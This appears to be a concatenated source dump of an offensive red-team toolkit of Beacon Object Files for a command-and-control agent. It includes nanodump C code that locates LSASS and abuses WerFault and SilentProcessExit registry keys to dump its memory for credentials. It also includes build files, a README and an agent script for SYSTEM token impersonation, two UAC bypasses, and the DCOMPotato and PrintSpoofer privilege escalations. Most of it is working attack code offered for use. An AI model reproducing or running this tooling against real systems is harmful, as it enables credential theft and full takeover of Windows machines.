        &image,
        &image_size);
    if (!success)
        return FALSE;

    if (image->Length == 0)
    {
        DATA_FREE(image, image_size);
        return FALSE;
    }

    if (wcsstr(image->Buffer, L"\\lsass.exe"))
    {
        DATA_FREE(image, image_size);
        return TRUE;
    }

    DATA_FREE(image, image_size);
    return FALSE;
}

/*
 * kill a process by PID
 * used to kill processes created by MalSecLogon
 */
BOOL kill_process(
    IN DWORD pid,
    IN HANDLE hProcess)
{
    if (!pid && !hProcess)
        return TRUE;

    if (pid)
    {
        // open a handle with PROCESS_TERMINATE
        hProcess = get_process_handle(
            pid,
            PROCESS_TERMINATE,
            FALSE,
            0);
        if (!hProcess)
        {
            DPRINT_ERR("Failed to kill process with PID: %ld", pid);
            return FALSE;
        }
    }

    NTSTATUS status = NtTerminateProcess(
        hProcess,
        ERROR_SUCCESS);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtTerminateProcess", status);
        if (pid)
        {
            DPRINT_ERR("Failed to kill process with PID: %ld", pid);
        }
        else
        {
            DPRINT_ERR("Failed to kill process with handle: 0x%lx", (DWORD)(ULONG_PTR)hProcess);
        }
        return FALSE;
    }
    if (pid)
    {
        DPRINT("Killed process with PID: %ld", pid);
    }
    else
    {
        DPRINT("Killed process with handle: 0x%lx", (DWORD)(ULONG_PTR)hProcess);
    }

    return TRUE;
}

DWORD get_lsass_pid(VOID)
{
    DWORD lsass_pid;
    HANDLE hProcess = find_lsass(PROCESS_QUERY_LIMITED_INFORMATION, 0);
    if (!hProcess)
        return 0;
    lsass_pid = get_pid(hProcess);
    NtClose(hProcess); hProcess = NULL;
    if (!lsass_pid)
    {
        DPRINT_ERR("Could not get the PID of " LSASS);
    }
    else
    {
        DPRINT("Found the PID of " LSASS ": %ld", lsass_pid);
    }
    return lsass_pid;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/werfault.c
================================================
#include "werfault.h"

// remove the registry keys created previously
BOOL cleanup_registry_keys(
    IN HANDLE SPEregKeyHandleSub,
    IN HANDLE IFEOregKeyHandle)
{
    BOOL success = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    if (SPEregKeyHandleSub)
    {
        status = NtDeleteKey(SPEregKeyHandleSub);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtDeleteKey", status);
            goto end;
        }
    }

    if (IFEOregKeyHandle)
    {
        status = NtDeleteKey(IFEOregKeyHandle);
        if (!NT_SUCCESS(status))
        {
            syscall_failed("NtDeleteKey", status);
            goto end;
        }
    }

    success = TRUE;

end:

    return success;
}

BOOL set_registry_keys(
    OUT PHANDLE pSPEregKeyHandleSub,
    OUT PHANDLE pIFEOregKeyHandle,
    IN LPCSTR dump_folder)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    BOOL success = FALSE;
    UNICODE_STRING IFEORegistryKeyName = { 0 };
    HANDLE SPEregKeyHandle = NULL;
    UNICODE_STRING SPERegistryKeyName = { 0 };
    LPWSTR proc = L"lsass.exe";
    OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributesSPE = { 0 };
    OBJECT_ATTRIBUTES ObjectAttributesSPESub = { 0 };
    RtlInitUnicodeString_t RtlInitUnicodeString = NULL;
    RtlAppendUnicodeToString_t RtlAppendUnicodeToString = NULL;
    UNICODE_STRING ReportingModeUnicodeStr = { 0 };
    UNICODE_STRING LocalDumpFolderUnicodeStr = { 0 };
    UNICODE_STRING DumpTypeUnicodeStr = { 0 };
    UNICODE_STRING GlobalFlagUnicodeStr = { 0 };
    WCHAR LocalDumpFolder[MAX_PATH] = { 0 };
    DWORD globalFlagData = 0;
    DWORD ReportingMode = 0;
    DWORD DumpType = 0;

    mbstowcs(LocalDumpFolder, dump_folder, MAX_PATH);

    RtlInitUnicodeString = (RtlInitUnicodeString_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlInitUnicodeString_SW2_HASH,
        0);
    if (!RtlInitUnicodeString)
    {
        api_not_found("RtlInitUnicodeString");
        return FALSE;
    }

    RtlAppendUnicodeToString = (RtlAppendUnicodeToString_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlAppendUnicodeToString_SW2_HASH,
        0);
    if (!RtlAppendUnicodeToString)
    {
        api_not_found("RtlAppendUnicodeToString");
        return FALSE;
    }

    // set up registry key name
    IFEORegistryKeyName.Length = 0;
    IFEORegistryKeyName.MaximumLength = 0;
    IFEORegistryKeyName.MaximumLength += (USHORT)wcslen(IFEO_REG_KEY) * sizeof(WCHAR);
    IFEORegistryKeyName.MaximumLength += (USHORT)wcslen(proc) * sizeof(WCHAR);
    IFEORegistryKeyName.MaximumLength +=  2;
    IFEORegistryKeyName.Buffer = intAlloc(IFEORegistryKeyName.MaximumLength);
    if (!IFEORegistryKeyName.Buffer)
    {
        malloc_failed();
        success = FALSE;
        goto end;
    }

    RtlAppendUnicodeToString(&IFEORegistryKeyName, IFEO_REG_KEY);
    RtlAppendUnicodeToString(&IFEORegistryKeyName, proc);

    // Creating the registry key
    InitializeObjectAttributes(&ObjectAttributes, &IFEORegistryKeyName, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateKey(
        pIFEOregKeyHandle,
        KEY_ALL_ACCESS,
        &ObjectAttributes,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateKey", status);
        success = FALSE;
        goto end;
    }

    DPRINT("Registry key has been created : %ls", IFEORegistryKeyName.Buffer);

    // https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/gflags-flag-table
    globalFlagData = FLG_MONITOR_SILENT_PROCESS_EXIT;
    RtlInitUnicodeString(&GlobalFlagUnicodeStr, L"GlobalFlag");

    status = NtSetValueKey(
        *pIFEOregKeyHandle,
        &GlobalFlagUnicodeStr,
        0,
        REG_DWORD,
        &globalFlagData,
        sizeof(globalFlagData));
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetValueKey", status);
        success = FALSE;
        goto end;
    }

    DPRINT("Registry key value has been created : %ls", GlobalFlagUnicodeStr.Buffer);

    // set up registry key name SPE
    SPERegistryKeyName.Length = 0;
    SPERegistryKeyName.MaximumLength = 0;
    SPERegistryKeyName.MaximumLength += (USHORT)wcslen(SILENT_PROCESS_EXIT_REG_KEY) * sizeof(WCHAR);
    SPERegistryKeyName.MaximumLength += (USHORT)wcslen(proc) * sizeof(WCHAR);
    SPERegistryKeyName.MaximumLength += 2;
    SPERegistryKeyName.Buffer = intAlloc(SPERegistryKeyName.MaximumLength);
    if (!SPERegistryKeyName.Buffer)
    {
        malloc_failed();
        success = FALSE;
        goto end;
    }

    RtlAppendUnicodeToString(&SPERegistryKeyName, SILENT_PROCESS_EXIT_REG_KEY);

    // Creating the registry key
    InitializeObjectAttributes(&ObjectAttributesSPE, &SPERegistryKeyName, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateKey(
        &SPEregKeyHandle,
        KEY_ALL_ACCESS,
        &ObjectAttributesSPE,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateKey", status);
        success = FALSE;
        goto end;
    }

    DPRINT("Registry key has been created : %ls", SPERegistryKeyName.Buffer);

    RtlAppendUnicodeToString(&SPERegistryKeyName, proc);

    // Creating the registry key
    InitializeObjectAttributes(&ObjectAttributesSPESub, &SPERegistryKeyName, OBJ_CASE_INSENSITIVE, NULL, NULL);

    status = NtCreateKey(
        pSPEregKeyHandleSub,
        KEY_ALL_ACCESS,
        &ObjectAttributesSPESub,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtCreateKey", status);
        success = FALSE;
        goto end;
    }

    DPRINT("Registry key has been created : %ls", SPERegistryKeyName.Buffer);

    ReportingMode = MiniDumpWithFullMemory;
    DumpType = LOCAL_DUMP;

    // Set SilentProcessExit registry values for the target process

    RtlInitUnicodeString(&ReportingModeUnicodeStr, L"ReportingMode");
    status = NtSetValueKey(
        *pSPEregKeyHandleSub,
        &ReportingModeUnicodeStr,
        0,
        REG_DWORD,
        &ReportingMode,
        sizeof(DWORD));
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetValueKey", status);
        success = FALSE;
        goto end;
    }

    RtlInitUnicodeString(&LocalDumpFolderUnicodeStr, L"LocalDumpFolder");
    status = NtSetValueKey(
        *pSPEregKeyHandleSub,
        &LocalDumpFolderUnicodeStr,
        0,
        REG_SZ,
        LocalDumpFolder,
        (ULONG)wcslen(LocalDumpFolder) * sizeof(WCHAR) + 2);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetValueKey", status);
        success = FALSE;
        goto end;
    }

    DPRINT("Sub key LocalDumpFolder has been created");

    RtlInitUnicodeString(&DumpTypeUnicodeStr, L"DumpType");
    status = NtSetValueKey(
        *pSPEregKeyHandleSub,
        &DumpTypeUnicodeStr,
        0,
        REG_DWORD,
        &DumpType,
        sizeof(DWORD));
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtSetValueKey", status);
        success = FALSE;
        goto end;
    }

    DPRINT("Sub key DumpType has been created");

    success = TRUE;

end:
    if (SPEregKeyHandle)
        NtClose(SPEregKeyHandle);
    if (IFEORegistryKeyName.Buffer)
    {
        DATA_FREE(IFEORegistryKeyName.Buffer, IFEORegistryKeyName.MaximumLength);
    }
    if (SPERegistryKeyName.Buffer)
    {
        DATA_FREE(SPERegistryKeyName.Buffer, SPERegistryKeyName.MaximumLength);
    }

    return success;
}

NTSTATUS SignalStartWerSvc(VOID)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    ULONG64 WNF_WER_SERVICE_START = 0x41940b3aa3bc0875;
    ULONG32 buffer = 1;

    status = NtQueryWnfStateNameInformation(
        &WNF_WER_SERVICE_START,
        1,
        0,
        &buffer,
        4);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQueryWnfStateNameInformation", status);
        goto end;
    }

    status = NtUpdateWnfStateData(
        &WNF_WER_SERVICE_START,
        NULL,
        0,
        0,
        NULL,
        0,
        0);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtUpdateWnfStateData", status);
        goto end;
    }

end:
    return status;    
}

NTSTATUS WaitForWerSvc(
    IN ULONG32 wait_time)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    HANDLE hEvent = NULL;
    OBJECT_ATTRIBUTES ObjectAttributes;
    UNICODE_STRING UnicodeString = { 0 };
    LARGE_INTEGER TimeOut = { 0 };
    RtlInitUnicodeString_t RtlInitUnicodeString = NULL;

    RtlInitUnicodeString = (RtlInitUnicodeString_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlInitUnicodeString_SW2_HASH,
        0);
    if (!RtlInitUnicodeString)
    {
        api_not_found("RtlInitUnicodeString");
        status = STATUS_UNSUCCESSFUL;
        goto end;
    }

    RtlInitUnicodeString(&UnicodeString, L"\\KernelObjects\\SystemErrorPortReady");

    InitializeObjectAttributes(
        &ObjectAttributes,
        &UnicodeString,
        0,
        NULL,
        NULL);

    status = NtOpenEvent(
        &hEvent,
        0x100001,
        &ObjectAttributes);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenEvent", status);
        goto end;
    }

    if ((LONG32)wait_time != -1)
    {
        TimeOut.QuadPart = (ULONG64)wait_time * -10000;
    }

    status = NtWaitForSingleObject(
        hEvent,
        FALSE,
        &TimeOut);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtWaitForSingleObject", status);
        goto end;
    }

    DPRINT("The WER is ready");

end:
    if (hEvent)
        NtClose(hEvent);

    return status;
}

NTSTATUS SendMessageToWERService(
    IN OUT PWER_API_MESSAGE_SEND api_message_send,
    IN OUT PWER_API_MESSAGE_RECV api_message_recv)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    SID sid = { 0 };
    SID_IDENTIFIER_AUTHORITY NtAuthority = { SECURITY_NT_AUTHORITY };
    HANDLE hPort = NULL;
    UNICODE_STRING ustr_port_name = { 0 };
    LARGE_INTEGER TimeOut = { 0 };
    RtlInitUnicodeString_t RtlInitUnicodeString = NULL;
    OBJECT_ATTRIBUTES object_attributes = { 0 };
    ALPC_PORT_ATTRIBUTES port_attributes = { 0 };
    SIZE_T BufferLength = sizeof(WER_API_MESSAGE_SEND);
    ULONG64 wait_time = 0;
    ULONG32 wait_time_1 = 0;
    ULONG32 wait_time_2 = 0;

    RtlInitUnicodeString = (RtlInitUnicodeString_t)(ULONG_PTR)get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlInitUnicodeString_SW2_HASH,
        0);
    if (!RtlInitUnicodeString)
    {
        api_not_found("RtlInitUnicodeString");
        status = STATUS_UNSUCCESSFUL;
        goto end;
    }

    status = SignalStartWerSvc();
    if (!NT_SUCCESS(status))
    {
        goto end;
    }

    // get the timeout times
    status = NtQuerySystemInformation(
        SystemErrorPortTimeouts,
        &wait_time,
        sizeof(ULONG64),
        NULL);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtQuerySystemInformation", status);
        goto end;
    }
    wait_time_1 = wait_time & 0xffffffff;
    wait_time_2 = (wait_time >> 32) & 0xffffffff;

    status = WaitForWerSvc(wait_time_1);
    if (!NT_SUCCESS(status))
    {
        goto end;
    }

    sid.Revision = 1;
    sid.SubAuthorityCount = 1;
    sid.IdentifierAuthority = NtAuthority;
    sid.SubAuthority[0] = 0x12;

    RtlInitUnicodeString(&ustr_port_name, L"\\WindowsErrorReportingServicePort");

    InitializeObjectAttributes(
        &object_attributes,
        NULL,
        0,
        NULL,
        NULL);

    port_attributes.MaxMessageLength = sizeof(WER_API_MESSAGE_SEND);

    if ((LONG32)wait_time_2 != -1)
    {
        TimeOut.QuadPart = (ULONG64)wait_time_2 * -10000;
    }

    status = NtAlpcConnectPort(
        &hPort,
        &ustr_port_name,
        &object_attributes,
        &port_attributes,
        0x20000,
        &sid,
        NULL,
        NULL,
        NULL,
        NULL,
        &TimeOut);
    if (!NT_SUCCESS(status) || status == STATUS_TIMEOUT)
    {
        syscall_failed("NtAlpcConnectPort", status);
        goto end;
    }

    DPRINT("Port handle: 0x%p", hPort);

    status = NtAlpcSendWaitReceivePort(
        hPort,
        0x20000,
        &api_message_send->port_message,
        NULL,
        &api_message_recv->port_message,
        &BufferLength,
        NULL,
        &TimeOut);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtAlpcSendWaitReceivePort", status);
        goto end;
    }

    DPRINT("Sent the message to the WER service");

end:
    if (hPort)
        NtClose(hPort);

    return status;
}

BOOL rtl_report_silent_process_exit(
    IN DWORD lsass_pid)
{
    BOOL success = FALSE;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    HANDLE hDupedHandle = NULL;
    DWORD process_id = 0;
    DWORD thread_id = 0;
    WER_API_MESSAGE_SEND api_message_send = { 0 };
    WER_API_MESSAGE_RECV api_message_recv = { 0 };

    process_id = (DWORD)(ULONG_PTR)((struct TEB*)NtCurrentTeb())->ClientId.UniqueProcess;
    thread_id = (DWORD)(ULONG_PTR)((struct TEB*)NtCurrentTeb())->ClientId.UniqueThread;
    if (!lsass_pid || !process_id || !thread_id)
    {
        status = STATUS_UNSUCCESSFUL;
        goto end;
    }

    DPRINT("LSASS PID: %ld, PID: %ld, TID: %ld", lsass_pid, process_id, thread_id);

    api_message_recv.port_message.u1.s1.DataLength = sizeof(WER_API_MESSAGE_RECV) - sizeof(PORT_MESSAGE);
    api_message_recv.port_message.u1.s1.TotalLength = sizeof(WER_API_MESSAGE_RECV);
    api_message_send.port_message.u1.s1.DataLength = sizeof(WER_API_MESSAGE_SEND) - sizeof(PORT_MESSAGE);
    api_message_send.port_message.u1.s1.TotalLength = sizeof(WER_API_MESSAGE_SEND);
    api_message_send.value1 = 0x30000000;
    api_message_send.ThreadId = thread_id;
    api_message_send.ProcessId = process_id;
    api_message_send.TargetProcessId = lsass_pid;

    status = SendMessageToWERService(
        &api_message_send,
        &api_message_recv);

    if (NT_SUCCESS(status) && status != STATUS_TIMEOUT)
    {
        do
        {
            status = NtWaitForSingleObject(
                api_message_recv.Handle,
                TRUE,
                NULL);
            if (!NT_SUCCESS(status) || status == STATUS_TIMEOUT)
                break;

        } while (status == STATUS_USER_APC || status == STATUS_ALERTED);
        if (api_message_recv.Handle)
            NtClose(api_message_recv.Handle);
    }

    if (NT_SUCCESS(status))
        success = TRUE;

end:
    if (hDupedHandle)
        NtClose(hDupedHandle);

    return success;
}

BOOL werfault_silent_process_exit(
    IN DWORD lsass_pid,
    IN LPCSTR dump_folder)
{
    BOOL success = FALSE;
    HANDLE SPEregKeyHandleSub = NULL;
    HANDLE IFEOregKeyHandle = NULL;
    CHAR dump_name[MAX_PATH] = { 0 };

    success = set_registry_keys(&SPEregKeyHandleSub, &IFEOregKeyHandle, dump_folder);
    if (!success)
    {
        PRINT_ERR("Failed to set the appropiate registry keys");
        goto end;
    }

    success = rtl_report_silent_process_exit(lsass_pid);
    if (!success)
    {
        PRINT_ERR("WerFault did not create the dump");
        goto end;
    }

    sprintf_s(dump_name, MAX_PATH, "lsass.exe-(PID-%ld).dmp", lsass_pid);
    print_success(dump_name, TRUE, FALSE);

    success = TRUE;

end:
    cleanup_registry_keys(SPEregKeyHandleSub, IFEOregKeyHandle);
    if (SPEregKeyHandleSub)
        NtClose(SPEregKeyHandleSub);
    if (IFEOregKeyHandle)
        NtClose(IFEOregKeyHandle);

    return success;
}

// this doesn't work for some reason
BOOL werfault_create_thread(
    IN HANDLE hProcess)
{
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    PVOID addr_RtlReportSilentProcessExit = NULL;
    HANDLE hThread = NULL;

    // get the address of RtlReportSilentProcessExit
    addr_RtlReportSilentProcessExit = get_function_address(
        get_library_address(NTDLL_DLL, TRUE),
        RtlReportSilentProcessExit_SW2_HASH,
        0);
    if (!addr_RtlReportSilentProcessExit)
    {
        PRINT_ERR("Could not find the address of RtlReportSilentProcessExit");
        return FALSE;
    }
    DPRINT("Address of RtlReportSilentProcessExit: 0x%p", addr_RtlReportSilentProcessExit);

    status = NtCreateThreadEx(
        &hThread,
        THREAD_ALL_ACCESS,
        NULL,
        hProcess,
        addr_RtlReportSilentProcessExit,
        NtCurrentProcess(), // first param, this will be LSASS' own handle
        0,
        0,
        0,
        0,
        NULL);
    if (!NT_SUCCESS(status))
    {
        PRINT_ERR("Failed to create the thread in " LSASS);
        return FALSE;
    }

    DPRINT("Thread handle: 0x%p", hThread);

    NtClose(hThread); hThread = NULL;

    return TRUE;
}


================================================
FILE: Dockerfile
================================================
FROM debian:bookworm-slim

RUN apt-get update && apt-get install -y --no-install-recommends \
    ca-certificates \
    make \
    build-essential \
    python3 \
    gcc-mingw-w64-x86-64 \
    g++-mingw-w64-x86-64 \
    gcc-mingw-w64-i686 \
    g++-mingw-w64-i686 \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /src

CMD ["make", "all"]

================================================
FILE: Elevation-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(Elevation-BOF C CXX)

set(CMAKE_C_STANDARD 99)
set(CMAKE_CXX_STANDARD 11)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(GETSYSTEM_TOKEN_SOURCES getsystem_token/getsystem_token.c)
set(UAC_REGSHELLCMD_SOURCES uac_regshellcmd/RegistryShellCommandBOF.c)
set(PRINTSPOOFER_SOURCES printspoofer/printspoofer.c)
set(UAC_SSPI_SOURCES uac_sspi/SspiUacBypassBOF.cpp)
set(DCOMPOTATO_SOURCES potato-dcom/DCOMPotato.cpp)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -w -Wno-int-conversion -Wno-incompatible-pointer-types")
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Os -w")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -s")

# Object file targets
add_library(getsystem_token OBJECT ${GETSYSTEM_TOKEN_SOURCES})
add_library(uac_regshellcmd OBJECT ${UAC_REGSHELLCMD_SOURCES})
add_library(printspoofer OBJECT ${PRINTSPOOFER_SOURCES})
target_compile_definitions(printspoofer PRIVATE BOF)

add_library(uac_sspi OBJECT ${UAC_SSPI_SOURCES})

add_library(DCOMPotato OBJECT ${DCOMPOTATO_SOURCES})
target_compile_options(DCOMPotato PRIVATE
    -masm=intel
    -nostdlib
    -Wno-nonnull
    -fno-asynchronous-unwind-tables
    -fno-exceptions
    -fno-rtti
)

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_getsystem_token ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:getsystem_token> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/getsystem_token.x64.o
    DEPENDS getsystem_token
    COMMENT "Copying getsystem_token object file"
)

add_custom_target(copy_uac_regshellcmd ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:uac_regshellcmd> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/uac_regshellcmd.x64.o
    DEPENDS uac_regshellcmd
    COMMENT "Copying uac_regshellcmd object file"
)

add_custom_target(copy_printspoofer ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:printspoofer> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/printspoofer.x64.o
    DEPENDS printspoofer
    COMMENT "Copying printspoofer object file"
)

add_custom_target(copy_uac_sspi ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:uac_sspi> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/uac_sspi.x64.o
    DEPENDS uac_sspi
    COMMENT "Copying uac_sspi object file"
)

add_custom_target(copy_DCOMPotato ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:DCOMPotato> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/DCOMPotato.x64.o
    DEPENDS DCOMPotato
    COMMENT "Copying DCOMPotato object file"
)


================================================
FILE: Elevation-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
CPP64 = x86_64-w64-mingw32-g++
CPP86 = i686-w64-mingw32-g++
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -w -Wno-int-conversion -Wno-incompatible-pointer-types -Os -s -DBOF -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin' || echo '_bin exists'
	# 64-bit builds
	@($(CC64) $(CFLAGS) getsystem_token/getsystem_token.c -o _bin/getsystem_token.x64.o && $(STRIP64) _bin/getsystem_token.x64.o) && echo '[+] getsystem_token' || echo '[!] getsystem_token'
	@($(CC64) $(CFLAGS) uac_regshellcmd/RegistryShellCommandBOF.c -o _bin/uac_regshellcmd.x64.o && $(STRIP64) _bin/uac_regshellcmd.x64.o) && echo '[+] uac_regshellcmd' || echo '[!] uac_regshellcmd'
	@($(CC64) $(CFLAGS) printspoofer/printspoofer.c -o _bin/printspoofer.x64.o && $(STRIP64) _bin/printspoofer.x64.o) && echo '[+] printspoofer' || echo '[!] printspoofer'
	@($(CPP64) -I ../_include -w -Os -s -c -o _bin/uac_sspi.x64.o uac_sspi/SspiUacBypassBOF.cpp && $(STRIP64) _bin/uac_sspi.x64.o) && echo '[+] uac_sspi' || echo '[!] uac_sspi'
	@($(CPP64) -I ../_include -w -Os -s -c -o _bin/DCOMPotato.x64.o potato-dcom/DCOMPotato.cpp -masm=intel -nostdlib -Wno-nonnull -fno-asynchronous-unwind-tables -fno-exceptions -fno-rtti && $(STRIP64) _bin/DCOMPotato.x64.o) && echo '[+] DCOMPotato' || echo '[!] DCOMPotato'

	# 32-bit builds
	@($(CC86) $(CFLAGS) getsystem_token/getsystem_token.c -o _bin/getsystem_token.x32.o && $(STRIP86) _bin/getsystem_token.x32.o) && echo '[+] getsystem_token (x32)' || echo '[!] getsystem_token (x32)'
	@($(CC86) $(CFLAGS) uac_regshellcmd/RegistryShellCommandBOF.c -o _bin/uac_regshellcmd.x32.o && $(STRIP86) _bin/uac_regshellcmd.x32.o) && echo '[+] uac_regshellcmd (x32)' || echo '[!] uac_regshellcmd (x32)'
	@($(CC86) $(CFLAGS) printspoofer/printspoofer.c -o _bin/printspoofer.x32.o && $(STRIP86) _bin/printspoofer.x32.o) && echo '[+] printspoofer (x32)' || echo '[!] printspoofer (x32)'
	@($(CPP86) -I ../_include -w -Os -s -c -o _bin/uac_sspi.x32.o uac_sspi/SspiUacBypassBOF.cpp && $(STRIP86) _bin/uac_sspi.x32.o) && echo '[+] uac_sspi (x32)' || echo '[!] uac_sspi (x32)'
	@($(CPP86) -I ../_include -w -Os -s -c -o _bin/DCOMPotato.x32.o potato-dcom/DCOMPotato.cpp -masm=intel -nostdlib -Wno-nonnull -fno-asynchronous-unwind-tables -fno-exceptions -fno-rtti && $(STRIP86) _bin/DCOMPotato.x32.o) && echo '[+] DCOMPotato (x32)' || echo '[!] DCOMPotato (x32)'



clean:
	@(rm -rf _bin)

================================================
FILE: Elevation-BOF/README.md
================================================
# Elevation-BOF

BOFs for context elevation

![](_img/01.png)



## getsystem token

Elevate the current agent to SYSTEM and gain the TrustedInstaller group privilege through impersonation.

```
getsystem token
```

The Get System item will be added to the Access menu in the table and the sessions column.

![](_img/02.png)



## uacbybass sspi

Forges a token from a fake network authentication though SSPI Datagram  Contexts. It will then impersonate the forged token and use CreateSvcRpc by [@x86matthew](https://twitter.com/x86matthew) to create a new SYSTEM service. Original research and code is from [@splinter_code](https://twitter.com/splinter_code).

```
uacbybass sspi <file.exe>
```



## uacbypass registryshellcmd

Modifies the "ms-settings\Shell\Open\command" registry key and executes an auto-elevated EXE (ComputerDefaults.exe).

```
uacbypass registryshellcmd <file.exe>
```



## potato-dcom

BOF version of [DCOMPotato](https://github.com/zcgonvh/DCOMPotato). Obtain SYSTEM privilege with SeImpersonate privilege by passing a malicious IUnknwon object to DCOM call of PrintNotify.

```
potato-dcom --token
potato-dcom --run <program with args>
```


## potato-print

BOF version of [PrintSpoofer](https://github.com/itm4n/PrintSpoofer). Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser().

```
potato-print --token
potato-print --run <program with args>
```


## Credits

* Elevate-System-Trusted-BOF - https://github.com/Mr-Un1k0d3r/Elevate-System-Trusted-BOF
* UAC-BOF-Bonanza - https://github.com/icyguider/UAC-BOF-Bonanza
* BOF-DCOMPotato-PrintNotify - https://github.com/Hagrid29/BOF-DCOMPotato-PrintNotify
* PrintSpoofer-BOF - https://github.com/SlimeOnSecurity/PrintSpoofer-BOF

================================================
FILE: Elevation-BOF/elevate.axs
================================================
var metadata = {
    name: "Elevation-BOF",
    description: "BOFs for context elevation"
};

/// COMMANDS

var _cmd_getsystem_token = ax.create_command("token", "Elevate the current agent to SYSTEM and gain the TrustedInstaller group privilege through impersonation", "getsystem token");
_cmd_getsystem_token.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let hook = function (task)
    {
        if(/Impersonate to SYSTEM & TrustedInstaller succeeded/.test(task.text)) {
            ax.agent_set_impersonate(task.agent, "SYSTEM", true);
        }
        return task;
    }

    let bof_path = ax.script_dir() + "_bin/getsystem_token." + ax.arch(id) + ".o";
    ax.execute_alias(id, cmdline, `execute bof "${bof_path}"`, "Task: Get system via token (BOF)", hook);
});
var cmd_getsystem = ax.create_command("getsystem", "Elevate context to SYSTEM");
cmd_getsystem.addSubCommands([_cmd_getsystem_token]);


var _cmd_uacbybass_sspi = ax.create_command("sspi", "Forges a token from a fake network authentication though SSPI Datagram Contexts", "uacbybass sspi c:\\windows\\tasks\\agent.exe");
_cmd_uacbybass_sspi.addArgString("path", true);
_cmd_uacbybass_sspi.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let path = parsed_json["path"];

    let bof_params = ax.bof_pack("cstr", [path]);
    let bof_path = ax.script_dir() + "_bin/uac_sspi." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: UAC Bypass (SSPI Datagram Contexts)");
});
var _cmd_uacbybass_regshell = ax.create_command("regshellcmd", "Modifies the \"ms-settings\\Shell\\Open\\command\" registry key and executes an auto-elevated EXE (ComputerDefaults.exe).", "uacbybass regshellcmd c:\\windows\\tasks\\agent.exe");
_cmd_uacbybass_regshell.addArgString("path", true);
_cmd_uacbybass_regshell.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let path = parsed_json["path"];

    let bof_params = ax.bof_pack("cstr", [path]);
    let bof_path = ax.script_dir() + "_bin/uac_regshellcmd." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: UAC Bypass (registry key Command)");
});
var cmd_uacbybass = ax.create_command("uacbybass", "Perform UAC bypass");
cmd_uacbybass.addSubCommands([_cmd_uacbybass_sspi, _cmd_uacbybass_regshell]);


var cmd_dcom_potato = ax.create_command("potato-dcom", "DCOMPotato - get SYSTEM via SeImpersonate privileges.", "potato-dcom --run C:\\Windows\\System32\\cmd.exe /c whoami /all");
cmd_dcom_potato.addArgBool( "--token", "Elevate the current agent to SYSTEM context");
